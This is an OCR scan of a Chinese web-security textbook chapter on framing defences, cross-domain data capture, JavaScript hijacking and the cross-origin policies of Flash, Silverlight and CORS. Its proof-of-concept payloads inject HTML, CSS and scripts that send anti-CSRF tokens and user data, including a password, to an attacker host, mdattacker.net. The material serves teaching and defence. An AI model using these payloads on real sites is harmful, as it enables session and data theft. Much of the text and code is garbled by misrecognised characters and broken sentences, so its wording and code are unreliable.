后 ， 许 多 其 他 流行 的 浏览 器 也 开始 采用 这 种 方法 。X-Frame-Options 消 息 
头 可 以 接受 两 个 值 。 值 deny 指 示 浏 览 器 防止 页 面 被 舱 入 框架 ， 值 
sameorigin 指 示 浏 览 器 防止 第 三 方 域 执 行 “ 能 入 框架 ?操作 。 





YV 提示 ”在 分 析 应 用 程序 采用 的 任何 反 骨 入 框 染 防御 时 ， 应 
始终 检查 适用 于 移动 设备 的 界面 的 任何 相关 版 本 。 例 如 ， 虽 然 
wahh-app.com/chat/ 能 够 可 靠 地 防范 钥 入 框架 攻击 ， 但 wahh- 
app.com/Amobile/chat/ 可 能 并 不 提供 此 类 防御 。 在 设计 反 姐 入 框架 防 
御 时 ， 应 用 程序 开发 者 通常 会 忽略 用 户 界 面 的 移动 版 本 ， 这 可 能 是 
因为 他 们 认为 UI 伪装 攻击 无 法 在 移动 设备 上 实施 。 但 是 ， 许 多 情况 
下 ， 在 使 用 标准 《〈 非 移动 ) 浏览 器 访问 时 ， 移 动 版 本 的 应 用 程序 仍 
常 运行， 并 且 用 户 会 话 可 以 在 移动 和 非 移动 版本 的 应 用 程 

之 间 共 享 。 


13.2 跨 域 桶 区 数据 


同 源 策略 旨 在 防止 在 一 个 域 中 运行 的 代码 访问 由 其 他 域 提供 的 内 
容 。 因 此 ， 路 站 点 请 求 伪 造 攻击 通 第 被 称 为 < 单 同 攻击。 虽然 一 个 域 可 
以 癌 男 一 个 域 提 供 请 求 ， 但 它 很 难 读 取 这 些 请 求 的 啊 应 ， 从 而 从 其 他 域 
HF EA Pt Sais o 

实际 上 ， 在 茶 些 情况 下 ， 有 各 种 攻击 技巧 可 用 于 从 其 他 域 中 捕获 整 





个 或 部 分 啊 应 。 通 常 ， 这 些 攻击 会 对 目标 应 用 程序 菜 方 面 的 功能 及 常见 
浏览 妖 的 茶 个 功能 加 以 综合 利用 ， 从 而 突破 同 源 琐 略 防 御 ， 实 现 跨 域 捕 
获 数据 的 目的 。 





与 利用 XSS 漏 洞 不 同 ， 攻 击 者 可 以 利用 许多 应 用 程序 提供 的 功能 ， 
在 其 他 用 户 收 到 的 响应 中 注入 一 段 有 限 的 HIML。 例 如 ，Web 邮 件 应 用 
程序 可 能 会 显示 包含 某 个 HTML 标记 的 电子 邮件 ， 但 会 阻止 可 用 于 执行 
脚本 代码 的 任何 标签 和 属性 。 或 者 ， 动 态 生 成 的 错误 消息 可 能 会 过 滤 一 
系列 表达 式 ， 但 仍然 允许 有 限 使 用 HTML。 

在 这 些 情况 下 ， 就 可 以 利用 HTML 注 入 条 件 向 攻击 者 所 在 的 域 发 送 
页 面 中 的 敏感 数据 。 例 如 ， 在 Web 邮 件 应 用 程序 中 ， 攻 击 者 或 许可 以 捕 
获 私 人 电子 邮件 的 内 容 。 或 者 ， 攻 击 者 也 许可 以 读 取 页 面 中 使 用 的 反 
CSRE 令 牌 ， 从 而 实施 CSREF 攻 击 ， 将 用 户 的 电子 邮件 转发 到 任意 地 址 。 
"M e 
EPA : 


[ limited HTML injection here | 





<form action="http://wahh-mail.com/forwardemail"* method="POST"> 


<input type="hidden" name="nonce" value="2230313740821"> 


<input type="submit" value="Forward"> 
</form> 


<script> 
var _StatsTrackerId='AAE78F27CB32i0D'; 


</script> 


在 注入 点 之 后 ， 页 面包 含 了 一 个 提供 CSREF 令 牌 的 HTML 表单 。 在 
这 种 情况 下 ， 攻 击 者 可 以 在 上 述 响 应 中 注入 以 下 文本 : 


<img src='http://mdattacker.net/capture?html= 


这 段 HTML 将 打开 一 个 指 问 攻击 者 域 中 的 URL 的 图 像 标签 。 该 URL 
包含 在 单 引号 内 ， a i ed Ei 这 
会 导致 浏览 器 将 注入 点 之 后 的 文本 视 为 URL 的 一 部 分 ， 直 到 过 到 单 引 
号 ， 也 就 是 中 应 中 随后 册 现 引用 的 JavaScript 字 符 惠 的 位 置 。 浏 览 器 接受 
各 种 插入 字符 ， 也 允许 URL 跨 越 多 行 。 

用 户 的 浏览 器 处 理 攻击 者 注入 的 响应 时 ， 它 会 尝试 提取 指定 的 图 
从 而 回 攻击 者 的 域 中 发 送 敏 感 的 反 CSRF 
DQ í 





http: //mdattacker.net/capture?html«<<formt20action="http: //wahh-mail.com/ 
forwarcemail"%20method="POST"><inpul$20type="hidden"t20name="nonce"320value= 
"2230313740821 *><inputt20tyne="submit"t20value="Porward"*>...</form>.., 
<script> var%20_StatsTrackerIds 

另 一 个 攻击 可 以 注入 以 下 文本 ; 


<form action=“http://maattacker.net/capture" method="POST"> 
此 攻击 在 应 用 程序 本 身 使 用 的 <form> 标 签 之 前 注入 一 个 指定 攻击 者 
域 的 <form> 标 签 。 在 这 种 情况 下 ， 浏 览 器 在 遇 到 骸 入 的 <form> 标 签 时 ， 
它们 将 忽略 该 标签 ， 并 在 遇 到 第 一 个 <form> 标 签 的 情况 下 处 理 表 单 。 因 
此 ， 如 果 用 户 提交 表单 ， 表 单 的 所 有 参数 ， 包 括 敏感 的 反 CSRF 令 牌 ， 
将 和 被 提交 到 攻击 者 的 服务 器 中 : 





POST /capture HTTP/1.1 

Content-Type: application/x-www-form-urlencoded 
Content-Length: 192 

Host: mdattacker.net 


nonce=2230313740821&... 

由 于 上 述 第 二 个 攻击 仅 注 入 了 格式 正常 的 HIML， 因 此 能 够 更 有 效 
地 避 开 那些 旨 在 允许 回 显 的 输入 中 的 HIML 子 集 的 过 滤 。 但 是 这 种 攻击 
也 需要 用 户 干 预 ， 在 某 些 情况 下 ， 这 可 能 会 降低 它 的 效率 。 





在 上 一 节 的 示例 中 ， 攻 击 者 需要 在 注入 的 文本 中 使 用 有 限 的 HTML 
标记 ， 才 能 跨 域 捕获 部 分 响应 。 但 是 ， 许 多 时 候 ， 应 用 程序 会 阻止 或 对 
注入 的 输入 中 的 < 和 > 字符 进行 HTML 编 码 ， 防 止 攻击 者 插入 任何 新 的 
HTML 标 签 。Web 应 用 程序 中 大 多 存在 此 类 纯 文 本 注入 和 条件， 并 且 人 们 
通常 认为 这 种 条 件 不 会 造成 危险 。 

例如 ， 在 一 个 Web 邮 件 应 用 程序 中 ， 攻 击 者 可 以 通过 电子 邮件 主题 
行 在 目标 用 户 的 啊 应 中 注入 有 限 的 文本 。 在 这 种 情况 下 ， 攻 击 者 可 以 通 
过 在 应 用 程序 中 注入 CSS 来 跨 域 捕获 敏感 数据 。 

在 上 述 示 例 中 ， 假 设 攻 击 者 发 送 带 以 下 主题 行 的 电子 邮件 : 











{}*{font-family:' 


由 于 其 中 不 包含 任何 HIML 元 字符 ， 大 多 数 用 户 都 接受 并 在 收 件 人 
E 
类 似 : 





<html> 
<head> 
<title>wahhMail Inbox</titie> 
</head> 


<body> 
<td>{}*{£Zont-family: '</cd> 


<form action="http: //wahh-mail.com/forwardemail" method="POST"> 
input type="hidden" name="nonce”* value="2230313740821"> 
r 


Q 
<input type="submit" value="Forward"> 


var _StatsTrackerTd='AAE78F27CB3210D 


</script> 
</boay> 


</html> 


很 明显 ， 此 响应 中 包含 HTML 。 但 奇怪 的 是 ， 浏 览 器 将 该 啊 应 加 载 
为 CSS 样 式 表 ， 将 正常 处 理 其 中 包含 的 任何 CSS 定 义 。 在 这 上 段 代 码 中 ， 
注入 的 啊 应 定义 了 CSS font-family 属 性 ， 并 将 一 个 引用 的 字符 串 作为 属 
性 定义 。 攻击 者 注入 的 文本 并 未 终止 该 字 符 串 ， 因 此 ， 该 字符 串 会 一 直 
持续 到 响应 的 剩余 部 分 ， 包 括 包 含 敏 感 的 反 CSRE 令 牌 的 隐藏 表单 字 
段 。 (请 注意 ， Css 定 义 不 需 要 被 引用 。 但 是 ， 如 果 没 有 引用 CSS 定 
A e a 而 该 分 号 可 能 出 现在 攻击 者 希 
望 捕 获 的 敏感 数据 之 前 。 

St os, be eee ee 
包含 CSS 样 式 表 形 式 的 注入 响应 。 这 会 在 攻击 者 自己 的 页 面 中 应 用 任何 
区 入 的 CSS 定 义 。 然 后 ， 攻 击 者 可 以 使 用 JavaScript 来 查询 这 些 定 义 ， 从 
bas P a J Al: 


<link rel="stylesheet" hr "https: //wahħhh-mail.com/inbox" type ext/ 














css"> 
<script> 

decument..write('<img sro="http://mdattacker.net/capture?' + 
escape (document. body.currentStyle.fontFamily) + *"“>'); 


此 页 面包 含 来 自 Web 邮 件 应 用 程序 的 表示 为 样式 表 的 相关 URL， 并 


i i 
中 定义 。 然 后 ，font-family 属 性 的 值 ， 包 括 敏感 的 反 CSRF 令 牌 ， 将 通过 


针对 以 下 URL 的 、 动 态 生成 的 请 求 传 送 到 攻击 者 的 服务 器 中 : 


http: ndattacker.net/ pture?$27%3C/tadssEsODsOA. . . SODSOASSCLorms20 
actions3D%22 https3A//wahh-mail.com/forwardemail$22%20methodt3bD%22 >0STs2 





Z2S3ESODSOASICinput$2 Ctypet3D$22hiddent22%2 0namet3D$22n0 t22$20values3 
DY222230313740821% 3ESOCD BOABS3Cinpul@2Z0ctypeS3Dt22submit422420values3D4 
22Porwards22$3ESODsOA. . . SODKOAS3 FormS$3ESODSOA. . . SODSOAS3CScriptS3EtOD 
s0CAvars20_StatsTrackerIds2D%2 AETSF2 B32 10D%27 





此 攻击 可 在 当 i cla eae. 为 防止 这 种 攻击 ， 
其 他 浏览 器 已 修改 了 它们 处 理 CSS 的 方式 ， 将 来 下 也 可 能 会 这 样 做 。 


13.2.3 JavaScript 劫持 


JavaScript 劫 持 提 供 了 另 一 种 路 域 捕 获 数据 的 方法 ， 从 而 将 CSRE 转 
换 为 一 种 有 限 的 “双向 ”攻击 。 如 第 3 章 所 述 ， 同 源 策 略 允 许 一 个 域 包含 
其 他 域 的 脚本 代码 ， 并 且 该 代码 可 以 在 调用 域 、 而 不 是 发 布 域 中 运行 。 
只 要 可 执行 的 应 用 程序 啊 应 使 用 仪 包 含 非 敏感 代码 (可 由 任何 应 用 程序 
用 户 访 问 的 静态 代码 ) 的 路 域 脚本 ， 这 种 规定 束 不 会 造成 危险 。 但 是 ， 
今天 的 许多 应 用 程序 都 使 用 JavaScript 来 传输 敏感 数据 ， 并 且 其 传输 方式 
并 不 受 同 源 策略 的 限制 。 此 外 ， 随 着 浏览 妖 技 术 的 发 展 ， 许 多 语法 都 可 
以 作为 有 效 的 JavaScript 执 行 ， 这 为 跨 域 捕获 数据 提供 了 新 的 机 会 。 

应 用 程序 设计 方面 的 变化 (归于 宽泛 的 “2.0” 概 仿 ) 也 为 使 用 
前 传输 敏感 数据 提供 了 新 的 方法 。 许 多 时 候 ， 

通过 向 服务 器 提供 异步 请 求 更 新 用 户 界 面 ， 一 种 快速 有 效 的 方法 ， 是 
sb B ANTE 并 在 其 中 以 某 种 形式 包含 需要 显示 的 特定 的 用 户 数 

在 这 一 节 中 ， 我 们 将 介绍 各 种 使 用 动态 执行 的 脚本 代码 来 传输 敏感 
数据 的 方法 。 同 时 ， 我 们 还 将 说 明 如 何 劫持 这 类 代码 ， 以 捕获 其 他 域 中 
的 数据 。 
1. 函数 回调 

以 一 个 应 用 程序 为 例 ， 它 在 当前 用 户 单 击 相 应 的 选项 卡 时 ， 在 用 户 
界面 中 显示 该 用 户 的 个 人 信息 。 为 提供 无 颖 的 用 户 体验 ， 应 用 程序 使 用 
异步 请 求 提取 用 户 信息 。 当 用 户 单 击 * 个 人 资源 ?选项 卡 时 ， 某 段 客户 端 
代码 将 动态 包含 以 下 脚本 : 


https://mdsec.net/auth/420/YourDetailsJson.ashx 


人 函数 回调 ， 该 函数 在 UI 中 显示 用 户 个 人 资 
Æ 














showUserInfo ( 
[ 
'Name', ‘Matthew Adamson' ], 
[ 'Username', '‘adammatt' ], 
'Password', '‘4nliub3' ], 
[ he, WEB Jy 
[ Rolet, ‘User* ] 
)); 
在 这 种 情况 下 ， 攻 击 者 可 以 创建 一 个 执行 showUserInfo 函 数 的 页 


面 ， 并 在 其 中 包含 传送 个 人 信息 的 脚本 ， 从 而 捕获 用 户 的 个 人 资源 。 一 
个 简单 的 概念 验证 攻击 如 下 所 示 : 


<script> 





function snowUseriInfo({x) { alert(x); } 

</script> 

<script src="httos://mdsec.net/auth/420/YourDetailsJson.ashx"> 

</script> 

如 果 用 户 在 访问 攻击 者 的 页 面 的 同时 ， 还 登录 了 某 个 易 受 攻击 的 应 
用 程序 ， 则 攻击 者 的 页 面 将 动态 插入 包含 用 户 个 人 信息 的 脚本 。 该 脚本 
将 调用 showUserInfo 函 数 ， 由 攻击 者 实施 时 ， 它 将 接收 用 户 的 个 人 资 
料 ， 包 括 用 户 的 密码 (如 本 例 所 示 )。 


Al, yn vw) 
笑 试 访问 
http://mdsec.net/auth/420/ 
2. JSON 


下 面 我 们 对 上 一 个 示例 稍 做 修改 ， 应 用 程序 将 不 再 在 动态 调用 的 脚 
本 中 执行 函数 回调 ， 而 是 返回 包含 用 户 个 人 资料 的 JSON 数 组 : 





[ 
‘'Name', ‘Matthew Adamson' ], 
'‘Username', ‘adammatt' ], 
'‘Password', ‘'4nliub3' ], 
‘Ui’, BB? Jy 
‘Role', 'User' 

] 


如 第 3 章 所 述 ，JSON 是 一 种 灵活 的 数据 表示 形式 ， 并 且 可 以 由 
JavaScript 解 释 器 直接 处 理 。 
在 旧版 本 的 Firefox 中 ， 攻 击 者 可 以 执行 一 次 跨 域 脚 本 包含 攻击 ， 通 
过 和 窗 盖 JavaScript 中 的 默认 Array 构 造 函 数 来 捕获 这 些 数据 。 例 如 : 
<script> 
function capture(s) { 
alert (s); 


function Array{) { 
for (Var i = OF i < 5: 14) 


this[i] setter = capture; 


</script> 
<script src="https://mdsec.net/autk/409/YourDetailsJson.ashx"> 
</script> 
此 攻击 修改 默认 的 Array 对 象 ， 并 定义 一 个 定制 的 setter 函 数 〈 在 为 
数组 中 的 元 又 分 配 值 时 将 调用 该 函数 ) 。 然 后 ， 它 执行 包含 JSON 数 据 
的 啊 应 。JavaScript 解 释 器 将 处 理 这 些 JSON 数 据 ， 构 造 一 个 Array 来 保存 


它们 的 值 ， 并 对 数组 中 的 每 个 值 调用 攻击 者 定制 的 setter 函 数 。 

由 于 此 类 攻击 已 于 2006 年 被 发 现 ， 因 而 开发 者 已 对 Firefox 进 行 了 修 
改 ， 以 防止 在 数据 初始 化 过 程 中 调用 定制 的 setter 函 数 。 此 攻击 无 法 在 当 
前 版 本 的 浏览 器 中 实施 。 


尝试 访 问 

http://mdsec.net/auth/409/ 

要 利用 本 示例 ， 请 下 载 2.0 版 本 的 Firefox。 请 从 以 下 URL 下 载 该 
版 本 的 Firefox: 


www.oldapps.com/firefox.php?old_firefox=26 


3. 变量 分 配 

以 一 个 社交 网 络 应 用 程序 为 例 ， 该 应 用 程序 大 量 使 用 异步 请 求 来 执 
行 各 种 操作 ， 如 更 新 状态 、 添 加 好 友和 发 布 评论 。 为 提供 快速 无 颖 的 用 
户 体 验 ， 一 部 分 用 户 界 面 使 用 动态 生成 的 脚本 加 载 。 
为 防止 标准 的 CSRF 攻 击 ， 这 些 脚 本 中 包含 了 反 CSRF 令 牌 ， 以 便 在 执行 
敏感 操作 时 使 用 。 利 用 在 动态 脚本 中 插入 这 些 令 牌 导致 的 漏洞 ， 攻 击 者 
可 以 通过 跨 域 包含 相关 脚本 来 捕获 令 牌 。 

网 如 ， 假 设 wahh-network.com 上 的 应 用 程序 返回 包含 以 下 代码 的 脚 














var nonce = '222230313740821'; 


一 个 用 于 跨 域 捕获 nonce 值 的 简单 概念 验证 攻击 如 下 所 示 : 
<script src="https://wahh-network.com/status"> 
</script> 
<script> 

alert (nonce); 
</script> 


在 力 一 个 示例 中 ， 令 牌 的 值 在 函数 中 进行 分 配 : 


function setStatus (status) 


{ 


nonce = '222230313740821'; 


} 
这 时 ， 攻 击 者 可 以 实施 以 下 攻击 : 


<script src="https://wahh-network.com/status"> 
</script> 
<script> 
setStatus('a'); 
alert (nonce); 
</script> 
针对 不 同 的 变量 分 配 情 形 ， 攻 击 者 可 以 采用 各 种 其 他 技巧 。 在 某 些 
情况 下 ， 攻 击 者 可 能 需要 在 一 定 程 度 上 模仿 目标 应 用 程序 的 客户 端 逻 
辑 ， 才 能 包含 该 程序 的 部 分 脚本 并 捕获 敏感 数据 。 
4. E4X 
就 在 不 久之 前 ，E4X 成 为 一 个 快速 发 展 的 领域 ， 为 应 对 在 各 种 实际 
应 用 程序 中 发 现 的 各 种 可 利用 条 件 ， 开 发 者 一 直 在 对 浏览 器 进行 更 新 。 
E4X 是 对 ECMAScript 语 言 (包括 JavaScript)〉 的 扩展 ， 后 者 可 为 
XML 语言 添加 本 地 文 持 。 目 前 ， 当 前 版 本 的 Firefox 浏 览 器 已 实施 了 
E4X。 尽 管 其 中 的 漏洞 已 经 修复 ， 但 Firefox 在 E4X 的 处 理 方 式 上 仍 存在 
漏洞 ， 可 用 于 蜂 域 捕获 数据 。 
除了 人 允许 在 JavaScript 中 直接 使 用 XML 语法 外 ， 用 户 还 可 以 在 E4X 
HATES, Wil A XML" AJavaScript: 


var foo=<bar>{prompt ("Please enter the value of bar.')})</bar>; 


E4X 的 这 些 特 性 导致 了 两 个 严重 的 后 果 ， 可 用 于 实施 跨 域 数据 捕获 

















攻击 : 
口 结构 正确 的 XML 标 记 将 被 视 为 不 会 分 配给 任何 变量 的 值 ; 
口 舱 入 {...} 块 中 的 文本 将 作为 JavaScript 执 行 ， 用 于 对 XML 数 据 的 
相关 部 分 进行 初始 化 。 

许多 结构 正确 的 HTML 也 是 结构 正确 的 XML， 意 味 着 它们 可 以 由 
E4X 进 行 处 理 。 此 外 ， 许 多 HTML 都 在 {..:} 块 中 包含 提供 敏感 数据 的 脚 


本 代码 。 例 如 : 
<html> 
<head> 


<script> 


function setNonce() 
{ 
nonce = '222230313740821'; 


</script> 
</head> 
<body> 
</body> 
</html> 
在 早期 版 本 的 Firefox 中 ， 攻 击 者 可 以 对 类 似 于 上 面 的 完整 HIML 响 
应 执行 跨 域 脚本 包含 ， 并 在 自己 的 域 中 执行 一 些 艇 入 式 JavaScript 代 码 。 
此 外 ， 利 用 与 之 前 所 述 的 CSS 注 入 攻击 类 似 的 技巧 ， 攻 击 者 有 时 可 
以 在 目标 应 用 程序 的 HTML 啊 应 中 的 适当 位 置 注入 文本 ， 在 该 响应 中 的 
敏感 数据 周围 插入 任意 的 {...} 块 。 然 后 ， 攻 击 者 可 以 跨 域 包含 整个 啊 
应 ， 将 其 作为 脚本 执行 ， 以 捕获 其 中 包含 的 数据 。 
上 述 任 何 一 种 攻击 都 可 以 在 当前 版 本 的 浏览 器 中 实施 。 随 着 这 个 过 
程 不 断 继续 ， 浏 览 占 对 于 最 新 语法 结构 的 支持 也 进一步 扩展 ， 在 新 的 浏 
览 占 功能 推出 之 前 ， 针 对 不 易于 受到 上 述 攻 击 的 应 用 程序 ， 很 可 能 会 出 
现 新 型 跨 域 数据 捕获 攻击 。 
5. 防止 JavaScript 劫 持 
实施 JavaScript 劫 持 攻 击 必 须 满足 几 个 前 提 条 件 。 因 此 ， 要 防止 这 种 
攻击 ， 必 须 违 反 其 中 至 少 一 个 前 提 条 件 。 要 获得 深层 保护 ， 我 们 建议 在 
防御 攻击 时 同时 采用 多 种 防范 措施 。 
口 至 于 执行 敏感 操作 的 请 求 ， 应 用 程序 应 使 用 标准 的 反 CSRF 防 御 
来 阻止 跨 域 请 求 返回 任何 包含 敏感 数据 的 啊 应 。 























O 当 应 用 程序 从 它 自己 的 域 中 动态 执行 JavaScript 代 人 码 时 ， 并 不 仅 限 
于 使 用 <script> 标 签 来 包含 脚本 。 因 为 请 求 为 本 站 请 求 ， 客 户 端 代码 可 
以 使 用 XMLHttpRequest 检 索 原 始 啊 应 并 进行 其 他 处 理 ， 然 后 再 将 其 作 
为 脚本 执行 。 这 意味 着 ， 应 用 程序 可 以 在 啊 应 的 开始 部 分 插入 无 效 或 有 
问题 的 JavaScript， 客 户 端 应 用 程序 在 处 理 脚 本 前 ， 将 会 删除 这 些 内 容 。 
例如 ， 以 下 脚本 在 使 用 脚本 包含 执行 时 将 导致 无 限 循 环 ， 但 如 果 使 用 
XMLHttpRequest 访 问 ， 则 可 以 在 执行 之 前 删除 : 

fortiri; 

口 由 于 应 用 程序 可 以 使 用 XMLHttpRequest 检 索 动 态 脚本 ， 因 此 它 也 
可 以 使 用 POST 请 求 完成 这 个 任务 。 如 果 应 用 程序 仅 接 受 使 用 POST 请 求 
访问 可 能 易 受 攻击 的 脚本 代码 ， 它 就 能 够 阻止 第 三 方 站 点 将 它们 包含 在 
<script> 标 签 内 。 











在 本 草 和 前 一 章 中 ， 我 们 介绍 了 如 何 将 同 源 人 策略 应 用 于 HIML 和 
JavaScript 的 大 量 示例 ， 以 及 利用 应 用 程序 漏洞 和 浏览 器 怪癖 突破 这 种 策 
略 的 各 种 方式 。 为 进一步 了 解 同 源 策略 对 于 Web 应 用 程序 安全 的 重要 
性 ， 我 们 将 在 这 一 节 中 介绍 其 他 一 些 适 用 该 策略 的 情形 ， 以 及 这 些 情 形 
如 何 会 导致 冰 些 跨 域 攻击 。 





各 种 广泛 部 署 的 浏览 堪 扩 展 技 术 全 都 在 域 之 间 实 施 了 某 种 隔离 ， 这 
种 隔离 的 实施 方式 与 主要 的 浏览 器 同 源 策略 所 采用 的 基本 原则 相同 。 但 
是 ， 每 种 实施 方式 的 一 些 特 点 在 某 些 情况 下 可 能 会 导致 跨 域 攻击 。 

1. 同 源 策 略 与 Flash 

Flash 对 象 的 来 源 由 加 载 这 些 对 象 的 URL 所 在 的 域 决定 ， 而 不 是 由 加 
载 这 些 对 象 的 HTML 页 面 的 URL 决 定 。 和 浏览 器 中 的 同 源 策略 一 样 ， 默 
认 情 况 下 ， 将 基于 协议 、 主 机 名 和 端口 号 实施 隔离 。 

除 与 同一 来 源 进行 完全 双 问 交互 外 ，Flash 对 象 还 可 以 通过 浏览 器 使 
用 URLRequest API 提 出 路 域 请 求 。 与 纯粹 的 浏览 器 技术 相 比 ， 以 这 种 方 
式 提 出 请 求 可 以 对 请 求实 施 更 进一步 的 控制 ， 如 能 够 指定 任意 的 
Content-Type 消 息 头 及 在 POST 请 求 主体 中 发 送 任意 内 容 。 将 对 这 些 请 求 
应 用 浏览 器 cookie， 但 默认 情况 下 ， 提 出 这 些 请 求 的 Flash 对 象 并 不 能 读 
取 对 路 源 请 求 做 出 的 啊 应 。 

Flash 提 供 了 一 种 机 制 ， 各 种 域 可 通过 这 种 机 制 回来 自 其 他 域 的 
Flash 对 象 授予 权限 ， 以 便于 这 些 对 象 与 它们 进行 完全 双 辐 的 交互 。 通 
常 ， 授 予 权限 的 域 会 在 URL /crossdomain.xml 处 发 布 一 个 策略 文件 ， 从 
而 完成 这 一 任务 。 当 某 个 Flash 对 象 答 试 提出 双 回 路 域 请 求 时 ，Flash 浏 
览 右 扩展 将 检索 所 请 求 的 域 中 的 策略 文件 ， 并 仪 在 所 请 求 的 域 授权 对 提 
出 请 求 的 域 的 访问 权限 时 ， 才 人 允许 上 述 请 求 。 

由 www.adobe.com 发 布 的 Flash 策 略 文 件 如 下 所 示 : 





























<?xml version="1.0"?> 
<cross-domain-policy> 
<site-control permitted-cross-domain-policies="by-content-type"/> 
<allow-access-from domain=s"*.macromedia.com" /> 
<allow-access-from domain="*.adobe.com" /> 
<allow-access-E£rom domain="*.chotoshep.com" /> 
<allow-access-from domain="*.acrobat.com" /> 
</cross-domain-policy> 


渗透 测试 步 又 


测试 员 应 始终 检查 所 测试 的 任何 Web 应 用 程序 中 
的 /crossdomain.xml 文 件 。 即 使 应 用 程序 本 身 不 使 用 Flash， 但 如 果 
问 另 一 个 域 授 予 权限 ， 则 由 该 域 发布 的 Flash 对 象 将 可 以 与 发 布 策略 
的 域 进行 交互 。 

口 如 果 应 用 程序 允许 无 限制 访问 (通过 指定 <allow-access-from 
domain=“*”/>) ， 则 任何 其 他 站 点 均 可 以 执行 双 问 交互 ， 从 而 控制 
应 用 程序 用 户 的 会 话 。 这 样 ， 其 他 域 就 可 以 检索 全 部 数据 ， 并 执行 
任何 用 户 操 作 。 

口 如 果 应 用 程序 可 以 访问 同一 组 织 使 用 的 子 域 或 其 他 域 ， 则 这 
些 域 当然 可 以 与 应 用 程序 进行 双 辐 交互 。 这 意味 着 ， 攻 击 者 可 以 利 
用 这 些 域 上 的 XSS 等 漏洞 来 攻破 授予 权限 的 域 。 此 外 ， 如 果 攻 击 者 
能 够 在 任何 域 上 购买 基于 Flash 的 广告 ， 束 可 以 使 用 其 部 署 的 Flash 
对 象 来 攻破 授予 权限 的 域 。 

口 一 些 策略 文件 会 披露 内 联网 主机 名 或 其 他 可 能 对 攻击 者 有 用 
的 敏感 信息 。 


此 外 ， 需 要 注意 的 是 ，Flash 对 象 可 能 会 在 应 从 中 下 载 策略 文件 的 目 
标 服 务 器 上 指定 一 个 URL。 如 果 默 认 位 置 没 有 顶级 策略 文件 ，Flash 浏 览 
器 会 尝试 从 该 指定 的 URL 处 下 载 策略 文件 。 对 此 URL 的 啊 应 必须 包含 格 
式 有 效 的 策略 文件 ， 并 必须 在 Content-Type 消 息 头 中 指定 一 种 XML 或 基 
于 文本 的 MIME 类 型 ， 才 能 得 到 处 理 。 当 前 ， 网 络 上 的 大 多 数 域 都 没有 
在 /crossdomain.xml 位 置 发 布 Flash 策 略 文件 ， 这 可 能 基于 以 下 假设 : 在 
没有 策略 的 情况 下 ， 默 认 行 为 是 禁止 任何 跨 域 访问 。 但 是 ， 这 一 假设 名 
略 了 第 三 方 Flash 对 象 指定 用 于 下 载 集 略 的 定制 URL 的 可 能 性 。 如 果 应 用 
程序 包含 任何 功能 ， 可 被 攻击 者 用 于 在 应 用 程序 域 上 的 URL 中 插入 任意 
XML 文 件 ， 则 该 应 用 程序 可 能 就 易于 受到 这 种 攻击 。 

2. FREK Silverlight 

用 于 Silverlight 的 同 源 策略 在 很 大 程度 上 基于 由 Flash 实 施 的 策略 。 
Silverlight 对 象 的 来 源 由 加 载 这 些 对 象 的 URL 所 在 的 域 决 定 ， 而 不 是 由 
加 载 这 些 对 象 的 HTML 页 面 的 URL 决 定 。 

Silverlight 与 Flash 的 一 个 重要 区 别 在 于 ，Silverlight 不 会 基于 协议 或 











端口 隔离 来 源 ， 因 此 通过 HTTP 加 载 的 对 象 可 以 与 同一 域 上 的 HTTPS 
URL2¢ H.. 

Silverlight 使 用 自己 的 跨 域 策略 文件 ， 地 址 
为 /clientaccesspolicy.xml。 由 www.microsoft.com 发 布 的 Silverlight 策 略 文 
件 如 下 所 示 : 


<?xml version="1.0" encoding="utf-8"?> 
<access-policy> 
<cross-domain-access> 
<policy> 
<allow-from > 
<domain uri="http://www.microsoft.com"/> 
<domain uri="http://i.microsoft.com"/> 
<domain uri="http://i2.microsoft.com"/> 
<domain uri="http://i3.microsoft.com"/> 
<domain uri="“http://i4.microsoft.com"/> 
<domain uri="http://img.microsoft.com"/> 
</allow-from> 
<grant-to> 
<resource path="/" include-subpaths="true"/> 
</grant-to> 
</policy> 
</cross-domain-access> 


</access-policy> 


上 面 介绍 的 针对 Flash 跨 域 策 略 文件 的 注意 事项 同样 适用 于 
Silverlight， 但 是 ，Silverlight 不 允许 对 象 为 策略 文件 指定 非 标 准 的 
URL. 

如 果 服 务 器 上 没有 Silverlight 策 略 文件 ，Silverlight 浏 览 器 扩展 会 党 
试 从 默认 位 置 加 载 有 效 的 Flash 策 略 文 件 。 不 过 ， 如 果 存 在 策略 文件 ， 则 
扩展 会 处 理 该 文件 。 

3. 同 源 策略 与 Java 

Java 在 来 源 之 间 实 施 隔 离 ， 它 实施 隔离 的 方式 在 很 大 程度 上 基于 浏 
览 右 的 同 源 策略 。 和 其 他 浏览 器 扩展 一 样 ，Java applet 对 象 的 来 源 由 加 
载 这些 对 象 的 URL 所 在 的 域 决 定 ， 而 不 是 由 加 载 这 些 对 象 的 HIML 页 面 
的 URL 决 定 。 

Java 同 源 策 略 的 一 个 重要 不 同 在 于 : 某 些 情况 下 ， 与 来 源 域 共享 卫 
地 址 的 其 他 域 将 被 视 为 " 同 源 ”。 在 某 些 共享 主机 的 情况 下 ， 这 可 能 会 导 











致 一 定 程 度 的 跨 域 交 互 。 
当前 ，Java 并 不 限制 一 个 域 友 布 允 许 与 其 他 域 进 行 交 互 的 集 略 。 








按照 最 初 的 设计 ，XMLHttpRequest 仅 允许 向 与 调用 页 面 的 来 源 相 
同 的 来 源 提出 请 求 。 随 着 HIML5 的 出 现 ， 这 一 技术 已 得 以 修改 ， 从 而 
可 以 与 其 他 域 进行 双向 交互 ， 前 提 是 被 访问 的 域 为 交互 提供 权限 。 

跨 域 交互 的 权限 通过 一 系列 新 的 HITP 消 息 头 来 实现 。 如 果 某 个 脚 
本 尝试 使 用 XMLHttpRequest 提 出 跨 域 请 求 ， 处 理 该 请 求 的 方式 将 因 请 
求 的 具体 内 容 而 异 。 

口 对于“ 常规” 请求 ， 即 可 以 使 用 现 有 的 HTML 结 构 跨 域 生成 的 请 
求 ， 浏 览 器 将 提出 请 求 ， 并 检 碍 生成 的 响应 消息 头 ， 以 确定 是 否 应 允许 
调用 脚本 访问 该 请 求 的 啊 应 。 

口 其 他 无 法 使 用 现 有 的 HTML 生成 的 请 求 ， 如 那些 使 用 非 标准 
HTTP 方 法 或 Content-Type、 或 添加 了 定制 HITP 消 息 头 的 请 求 ， 将 进行 
不 同 处 理 。 浏 览 器 会 首先 问 目标 URL 提 出 一 个 OPTIONS 请 求 ， 然 后 检 
得 啊 应 消息 头 ， 以 确定 是 否 应 允许 那些 请 求 。 

在 上 述 两 种 情况 下 ， 浏 览 器 都 会 添加 一 个 Origin 消 息 头 ， 用 于 指示 
尝试 提出 跨 域 请 求 的 域 。 

Oxigin: http: //wahh-app. com 

